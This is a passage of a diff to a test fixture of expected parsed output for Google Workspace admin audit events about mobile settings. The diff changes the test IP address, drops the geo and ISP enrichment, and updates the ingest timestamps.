"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_APPLICATION_TO_WHITELIST\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"}]}}", + "ingested": "2021-12-09T13:38:46.977455100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_APPLICATION_TO_WHITELIST\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"}]}}", "provider": "admin", "action": "ADD_MOBILE_APPLICATION_TO_WHITELIST", "id": "1", @@ -1083,7 +849,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1107,35 +873,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821656800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_APPROVE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:46.977475700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_APPROVE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOBILE_DEVICE_APPROVE", "id": "1", @@ -1166,7 +914,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1190,35 +938,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821659100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_BLOCK\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:46.977481300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_BLOCK\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOBILE_DEVICE_BLOCK", "id": "1", @@ -1249,7 +979,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1273,35 +1003,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821661Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_DELETE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:46.977512300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_DELETE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOBILE_DEVICE_DELETE", "id": "1", @@ -1332,7 +1044,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1356,35 +1068,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821663Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_WIPE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:46.977517500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_WIPE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOBILE_DEVICE_WIPE", "id": "1", @@ -1415,7 +1109,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1439,35 +1133,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821665Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:46.977521800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_MOBILE_SETTING", "id": "1", @@ -1498,7 +1174,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1522,35 +1198,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821667Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_ADMIN_RESTRICTIONS_PIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:46.977526700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_ADMIN_RESTRICTIONS_PIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHANGE_ADMIN_RESTRICTIONS_PIN", "id": "1", @@ -1580,7 +1238,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1604,35 +1262,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821668900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:46.977532400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHANGE_MOBILE_WIRELESS_NETWORK", "id": "1", @@ -1662,7 +1302,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1686,35 +1326,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821670900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:46.977538100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "ADD_MOBILE_WIRELESS_NETWORK", "id": "1", @@ -1744,7 +1366,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1768,35 +1390,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821672800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:46.977559600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "REMOVE_MOBILE_WIRELESS_NETWORK", "id": "1", @@ -1826,7 +1430,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1850,35 +1454,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821674700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:46.977649400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD", "id": "1", @@ -1908,7 +1494,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1932,35 +1518,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821676800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_CERTIFICATE_COMMON_NAME\",\"value\":\"cert\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:46.977654100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_CERTIFICATE_COMMON_NAME\",\"value\":\"cert\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "REMOVE_MOBILE_CERTIFICATE", "id": "1", @@ -1990,7 +1558,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2009,35 +1577,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821678700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT\"}}", + "ingested": "2021-12-09T13:38:46.977657600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT\"}}", "provider": "admin", "action": "ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT", "id": "1", @@ -2067,7 +1617,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2086,35 +1636,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821680600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT\"}}", + "ingested": "2021-12-09T13:38:46.977661800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT\"}}", "provider": "admin", "action": "USE_GOOGLE_MOBILE_MANAGEMENT", "id": "1", @@ -2144,7 +1676,7 @@ "foo" ], "ip": [ - "98.235.162.24" + 